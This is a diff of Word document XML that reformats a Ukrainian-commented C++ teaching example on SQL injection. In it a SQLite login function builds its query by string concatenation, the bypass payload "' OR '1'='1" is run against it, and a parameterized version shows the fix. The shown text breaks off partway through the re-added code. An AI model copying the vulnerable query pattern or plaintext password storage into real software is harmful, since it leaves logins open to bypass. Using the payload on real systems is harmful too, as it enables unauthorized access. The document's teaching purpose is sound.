-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">        "INSERT INTO users (login, password, role) VALUES ('user1', 'pass1', 'user');";</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    sqlite3_exec(db, schema, nullptr, nullptr, nullptr);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    return db;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">// ВРАЗЛИВИЙ варіант: запит склеюється з рядків, дані користувача</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">// потрапляють у текст запиту й змінюють його структуру</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">bool vulnerableLogin(sqlite3* db, const std::string&amp; login,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">                     const std::string&amp; password) {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    std::string query = "SELECT login, role FROM users WHERE login='" + login +</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">                        "' AND password='" + password + "'";</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    std::cout &lt;&lt; "[ВРАЗЛИВИЙ] Запит: " &lt;&lt; query &lt;&lt; "\n";</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    sqlite3_stmt* stmt = nullptr;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    if (sqlite3_prepare_v2(db, query.c_str(), -1, &amp;stmt, nullptr) != SQLITE_OK) {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">        std::cout &lt;&lt; "[ВРАЗЛИВИЙ] Помилка SQL: " &lt;&lt; sqlite3_errmsg(db) &lt;&lt; "\n";</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">        return false;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    }</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    bool found = (sqlite3_step(stmt) == SQLITE_ROW);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    if (found) {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">        std::cout &lt;&lt; "[ВРАЗЛИВИЙ] Вхід виконано як: "</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">                  &lt;&lt; sqlite3_column_text(stmt, 0) &lt;&lt; " (роль "</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">                  &lt;&lt; sqlite3_column_text(stmt, 1) &lt;&lt; ")\n";</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    }</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    sqlite3_finalize(stmt);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    return found;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">// БЕЗПЕЧНИЙ варіант: структура запиту фіксована, дані передаються</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">// окремо через параметри й ніколи не тлумачаться як код SQL</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">bool safeLogin(sqlite3* db, const std::string&amp; login, const std::string&amp; password) {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    const char* query = "SELECT login, role FROM users WHERE login=? AND password=?";</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    std::cout &lt;&lt; "[БЕЗПЕЧНИЙ] Запит: " &lt;&lt; query &lt;&lt; "\n";</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    std::cout &lt;&lt; "[БЕЗПЕЧНИЙ] Параметри: ('" &lt;&lt; login &lt;&lt; "', '" &lt;&lt; password &lt;&lt; "')\n";</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    sqlite3_stmt* stmt = nullptr;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    sqlite3_prepare_v2(db, query, -1, &amp;stmt, nullptr);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    sqlite3_bind_text(stmt, 1, login.c_str(), -1, SQLITE_TRANSIENT);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    sqlite3_bind_text(stmt, 2, password.c_str(), -1, SQLITE_TRANSIENT);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    bool found = (sqlite3_step(stmt) == SQLITE_ROW);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    if (found) {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">        std::cout &lt;&lt; "[БЕЗПЕЧНИЙ] Вхід виконано як: "</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">                  &lt;&lt; sqlite3_column_text(stmt, 0) &lt;&lt; "\n";</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    }</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    sqlite3_finalize(stmt);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    return found;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">int main() {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    sqlite3* db = setupDatabase();</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    std::cout &lt;&lt; "=== Коректний вхід ===\n";</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    vulnerableLogin(db, "admin", "secret123");</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    std::cout &lt;&lt; "\n=== Атака SQL-ін'єкцією ===\n";</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    // Введене значення закриває лапку й додає умову, істинну завжди</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    std::string injection = "' OR '1'='1";</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    bool bypassed = vulnerableLogin(db, "admin", injection);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    std::cout &lt;&lt; "Результат: "</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">              &lt;&lt; (bypassed ? "ЗАХИСТ ОБІЙДЕНО" : "доступ відхилено") &lt;&lt; "\n";</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    std::cout &lt;&lt; "\n=== Та сама атака на параметризованому запиті ===\n";</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    bool blocked = safeLogin(db, "admin", injection);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    std::cout &lt;&lt; "Результат: "</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">              &lt;&lt; (blocked ? "ЗАХИСТ ОБІЙДЕНО" : "доступ відхилено") &lt;&lt; "\n";</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    sqlite3_close(db);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    return 0;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="120" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">}</w:t>
-      </w:r>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
+        <w:rPr>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="SourceCodeTable"/>
+        <w:tblW w:type="dxa" w:w="9637"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        </w:tblBorders>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:type="dxa" w:w="113"/>
+          <w:left w:type="dxa" w:w="113"/>
+          <w:bottom w:type="dxa" w:w="113"/>
+          <w:right w:type="dxa" w:w="113"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9637"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="9637"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// Демонстрація SQL-ін'єкції та захисту від неї.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// Потрібна бібліотека SQLite: у Visual Studio додайте sqlite3.c і sqlite3.h</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// до проєкту (амальгама з sqlite.org) або підключіть пакет через NuGet.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#include &lt;iostream&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#include &lt;string&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#include "sqlite3.h"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// Створює навчальну базу в пам'яті з двома обліковими записами</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">sqlite3* setupDatabase() {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3* db = nullptr;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3_open(":memory:", &amp;db);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    const char* schema =</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        "CREATE TABLE users ("</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        "  id INTEGER PRIMARY KEY,"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        "  login TEXT NOT NULL,"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        "  password TEXT NOT NULL,"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        "  role TEXT DEFAULT 'user');"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        "INSERT INTO users (login, password, role) "</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        "VALUES ('admin', 'secret123', 'admin');"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        "INSERT INTO users (login, password, role) "</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        "VALUES ('user1', 'pass1', 'user');";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3_exec(db, schema, nullptr, nullptr, nullptr);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
